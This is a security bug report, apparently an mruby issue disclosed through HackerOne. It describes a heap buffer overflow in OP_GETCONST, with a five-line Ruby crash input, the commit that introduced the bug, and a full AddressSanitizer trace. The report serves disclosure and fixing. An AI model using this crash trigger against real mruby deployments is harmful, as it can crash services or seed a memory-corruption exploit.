Heap buffer overflow in OP_GETCONST

[clayton-shopify]

The following input demonstrates a crash:

loop do
  Module.initialize { break }
  break
end
puts break[0].to_s

It seems this issue was introduced in eb5a606. Prior to that commit, the program exits with LocalJumpError:unexpected break.

ASAN report:

==12392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200001f09c at pc 0x000105374c89 bp 0x7fff5a9e9130 sp 0x7fff5a9e9128
READ of size 4 at 0x60200001f09c thread T0
    #0 0x105374c88 in mrb_vm_exec (mruby:x86_64+0x100167c88)
    #1 0x105370886 in mrb_vm_run (mruby:x86_64+0x100163886)
    #2 0x1053a49bf in mrb_top_run (mruby:x86_64+0x1001979bf)
    #3 0x105476d95 in mrb_load_exec (mruby:x86_64+0x100269d95)
    #4 0x1054776e5 in mrb_load_file_cxt (mruby:x86_64+0x10026a6e5)
    #5 0x10520fa46 in main mruby.c:227
    #6 0x7fffe5638234 in start (libdyld.dylib:x86_64+0x5234)

0x60200001f09c is located 0 bytes to the right of 12-byte region [0x60200001f090,0x60200001f09c)
allocated by thread T0 here:
    #0 0x105620520 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56520)
    #1 0x105304155 in mrb_default_allocf (mruby:x86_64+0x1000f7155)
    #2 0x105284de8 in mrb_realloc_simple gc.c:203
    #3 0x105437f45 in codegen_realloc (mruby:x86_64+0x10022af45)
    #4 0x10544861c in scope_finish (mruby:x86_64+0x10023b61c)
    #5 0x10543aa7a in scope_body (mruby:x86_64+0x10022da7a)
    #6 0x105425cc5 in codegen (mruby:x86_64+0x100218cc5)
    #7 0x10541f3b1 in mrb_generate_code (mruby:x86_64+0x1002123b1)
    #8 0x105476210 in mrb_load_exec (mruby:x86_64+0x100269210)
    #9 0x1054776e5 in mrb_load_file_cxt (mruby:x86_64+0x10026a6e5)
    #10 0x10520fa46 in main mruby.c:227
    #11 0x7fffe5638234 in start (libdyld.dylib:x86_64+0x5234)

SUMMARY: AddressSanitizer: heap-buffer-overflow (mruby:x86_64+0x100167c88) in mrb_vm_exec
Shadow bytes around the buggy address:
  0x1c0400003dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0400003dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0400003de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0400003df0: fa fa fa fa fa fa fa fa fa fa 00 00 fa fa 00 00
  0x1c0400003e00: fa fa 00 00 fa fa 00 06 fa fa 00 fa fa fa 00 fa
=>0x1c0400003e10: fa fa 00[04]fa fa 00 00 fa fa 00 06 fa fa 00 02
  0x1c0400003e20: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 02
  0x1c0400003e30: fa fa 00 06 fa fa 04 fa fa fa 00 fa fa fa 04 fa
  0x1c0400003e40: fa fa 00 fa fa fa 00 00 fa fa fd fd fa fa 00 00
  0x1c0400003e50: fa fa fd fd fa fa 00 00 fa fa fd fd fa fa fd fd
  0x1c0400003e60: fa fa 00 06 fa fa fd fd fa fa 00 06 fa fa 05 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12392==ABORTING
Abort trap: 6

This issue was reported by https://hackerone.com/flamezzz